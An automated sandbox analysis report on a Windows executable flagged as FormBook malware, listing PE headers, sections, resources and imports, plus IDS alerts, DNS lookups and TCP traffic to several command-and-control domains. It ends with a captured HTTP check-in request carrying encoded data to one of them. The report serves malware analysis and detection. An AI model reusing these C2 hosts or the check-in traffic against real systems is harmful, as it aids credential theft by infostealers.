                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x11d0000x711c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xc70000x551bc0x55200c8df9ddd37363ee83d1458ba72655d7fFalse0.9232344438325991data7.882499569712898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x11d0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                  RT_RCDATA0xcf7b80x4c484data1.0003392521091239
                                                  RT_GROUP_ICON0x11bc3c0x76dataEnglishGreat Britain0.6610169491525424
                                                  RT_GROUP_ICON0x11bcb40x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0x11bcc80x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0x11bcdc0x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0x11bcf00xdcdataEnglishGreat Britain0.6181818181818182
                                                  RT_MANIFEST0x11bdcc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                  Imports

                                                  DLLImport
                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                  PSAPI.DLLGetProcessMemoryInfo
                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dllIsThemeActive
                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-17T18:39:08.495731+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6498413.33.130.19080TCP
                                                  2024-12-17T18:39:25.345565+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498803.33.130.19080TCP
                                                  2024-12-17T18:39:28.014150+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498863.33.130.19080TCP
                                                  2024-12-17T18:39:30.768674+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498953.33.130.19080TCP
                                                  2024-12-17T18:39:34.352227+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499023.33.130.19080TCP
                                                  2024-12-17T18:39:49.598024+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499388.217.17.19280TCP
                                                  2024-12-17T18:39:52.254372+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499448.217.17.19280TCP
                                                  2024-12-17T18:39:54.910475+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499518.217.17.19280TCP
                                                  2024-12-17T18:39:57.628568+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499598.217.17.19280TCP
                                                  2024-12-17T18:40:04.454686+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649976209.74.64.18980TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 17, 2024 18:39:07.266043901 CET4984180192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:07.386809111 CET80498413.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:07.386909962 CET4984180192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:07.394342899 CET4984180192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:07.520792007 CET80498413.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:08.495027065 CET80498413.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:08.495667934 CET80498413.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:08.495731115 CET4984180192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:08.497895956 CET4984180192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:08.618449926 CET80498413.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:24.128247976 CET4988080192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:24.248356104 CET80498803.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:24.248481035 CET4988080192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:24.257255077 CET4988080192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:24.376869917 CET80498803.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:25.345381021 CET80498803.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:25.345489025 CET80498803.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:25.345565081 CET4988080192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:25.770011902 CET4988080192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:26.795696020 CET4988680192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:26.916212082 CET80498863.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:26.916328907 CET4988680192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:26.925138950 CET4988680192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:27.045104980 CET80498863.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:28.013927937 CET80498863.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:28.014050961 CET80498863.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:28.014149904 CET4988680192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:28.426193953 CET4988680192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:29.444310904 CET4989580192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:29.563925028 CET80498953.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:29.564018965 CET4989580192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:29.574173927 CET4989580192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:29.694701910 CET80498953.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:29.694763899 CET80498953.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:30.768387079 CET80498953.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:30.768477917 CET80498953.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:30.768673897 CET4989580192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:31.082464933 CET4989580192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:32.100661993 CET4990280192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:32.223295927 CET80499023.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:32.223579884 CET4990280192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:32.230590105 CET4990280192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:32.356210947 CET80499023.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:34.351852894 CET80499023.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:34.352042913 CET80499023.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:34.352226973 CET4990280192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:34.354773045 CET4990280192.168.2.63.33.130.190
                                                  Dec 17, 2024 18:39:34.474411964 CET80499023.33.130.190192.168.2.6
                                                  Dec 17, 2024 18:39:47.945583105 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:48.071948051 CET80499388.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:48.075351000 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:48.088808060 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:48.213957071 CET80499388.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:49.598023891 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:49.640261889 CET80499388.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:49.640429020 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:49.640455961 CET80499388.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:49.640558004 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:49.717737913 CET80499388.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:49.717829943 CET4993880192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:50.616053104 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:50.735764980 CET80499448.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:50.735989094 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:50.744942904 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:50.864649057 CET80499448.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:52.254371881 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:52.302967072 CET80499448.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:52.302989006 CET80499448.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:52.303062916 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:52.303112030 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:52.374264956 CET80499448.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:52.374330044 CET4994480192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:53.272301912 CET4995180192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:53.391931057 CET80499518.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:53.392061949 CET4995180192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:53.402185917 CET4995180192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:53.522094965 CET80499518.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:53.522155046 CET80499518.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:54.910475016 CET4995180192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:55.030810118 CET80499518.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:55.030911922 CET4995180192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:55.928766966 CET4995980192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:56.048531055 CET80499598.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:56.048696995 CET4995980192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:56.062727928 CET4995980192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:56.183871031 CET80499598.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:57.627840996 CET80499598.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:57.628396034 CET80499598.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:39:57.628567934 CET4995980192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:57.631371021 CET4995980192.168.2.68.217.17.192
                                                  Dec 17, 2024 18:39:57.751034975 CET80499598.217.17.192192.168.2.6
                                                  Dec 17, 2024 18:40:03.080871105 CET4997680192.168.2.6209.74.64.189
                                                  Dec 17, 2024 18:40:03.200550079 CET8049976209.74.64.189192.168.2.6
                                                  Dec 17, 2024 18:40:03.200627089 CET4997680192.168.2.6209.74.64.189
                                                  Dec 17, 2024 18:40:03.212359905 CET4997680192.168.2.6209.74.64.189
                                                  Dec 17, 2024 18:40:03.332475901 CET8049976209.74.64.189192.168.2.6
                                                  Dec 17, 2024 18:40:04.454339981 CET8049976209.74.64.189192.168.2.6
                                                  Dec 17, 2024 18:40:04.454463959 CET8049976209.74.64.189192.168.2.6
                                                  Dec 17, 2024 18:40:04.454685926 CET4997680192.168.2.6209.74.64.189

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 17, 2024 18:39:06.670341015 CET5189853192.168.2.61.1.1.1
                                                  Dec 17, 2024 18:39:07.259875059 CET53518981.1.1.1192.168.2.6
                                                  Dec 17, 2024 18:39:23.538861990 CET6427053192.168.2.61.1.1.1
                                                  Dec 17, 2024 18:39:24.125812054 CET53642701.1.1.1192.168.2.6
                                                  Dec 17, 2024 18:39:39.366869926 CET5590653192.168.2.61.1.1.1
                                                  Dec 17, 2024 18:39:39.599817038 CET53559061.1.1.1192.168.2.6
                                                  Dec 17, 2024 18:39:47.663718939 CET5210653192.168.2.61.1.1.1
                                                  Dec 17, 2024 18:39:47.943042994 CET53521061.1.1.1192.168.2.6
                                                  Dec 17, 2024 18:40:02.648977995 CET6154253192.168.2.61.1.1.1
                                                  Dec 17, 2024 18:40:03.078237057 CET53615421.1.1.1192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 17, 2024 18:39:06.670341015 CET192.168.2.61.1.1.10x84afStandard query (0)www.arcare.partnersA (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:23.538861990 CET192.168.2.61.1.1.10x4da3Standard query (0)www.medicaresbasics.xyzA (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:39.366869926 CET192.168.2.61.1.1.10xc114Standard query (0)www.resellnexa.shopA (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:47.663718939 CET192.168.2.61.1.1.10x355fStandard query (0)www.meliorahomes.netA (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:40:02.648977995 CET192.168.2.61.1.1.10x2ac9Standard query (0)www.martmall.infoA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 17, 2024 18:39:07.259875059 CET1.1.1.1192.168.2.60x84afNo error (0)www.arcare.partnersarcare.partnersCNAME (Canonical name)IN (0x0001)false
                                                  Dec 17, 2024 18:39:07.259875059 CET1.1.1.1192.168.2.60x84afNo error (0)arcare.partners3.33.130.190A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:07.259875059 CET1.1.1.1192.168.2.60x84afNo error (0)arcare.partners15.197.148.33A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:24.125812054 CET1.1.1.1192.168.2.60x4da3No error (0)www.medicaresbasics.xyzmedicaresbasics.xyzCNAME (Canonical name)IN (0x0001)false
                                                  Dec 17, 2024 18:39:24.125812054 CET1.1.1.1192.168.2.60x4da3No error (0)medicaresbasics.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:24.125812054 CET1.1.1.1192.168.2.60x4da3No error (0)medicaresbasics.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:39.599817038 CET1.1.1.1192.168.2.60xc114Name error (3)www.resellnexa.shopnonenoneA (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:39:47.943042994 CET1.1.1.1192.168.2.60x355fNo error (0)www.meliorahomes.net8.217.17.192A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 18:40:03.078237057 CET1.1.1.1192.168.2.60x2ac9No error (0)www.martmall.info209.74.64.189A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.arcare.partners
                                                  • www.medicaresbasics.xyz
                                                  • www.meliorahomes.net
                                                  • www.martmall.info

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.6498413.33.130.190802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:07.394342899 CET515OUTGET /0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs HTTP/1.1
                                                  Host: www.arcare.partners
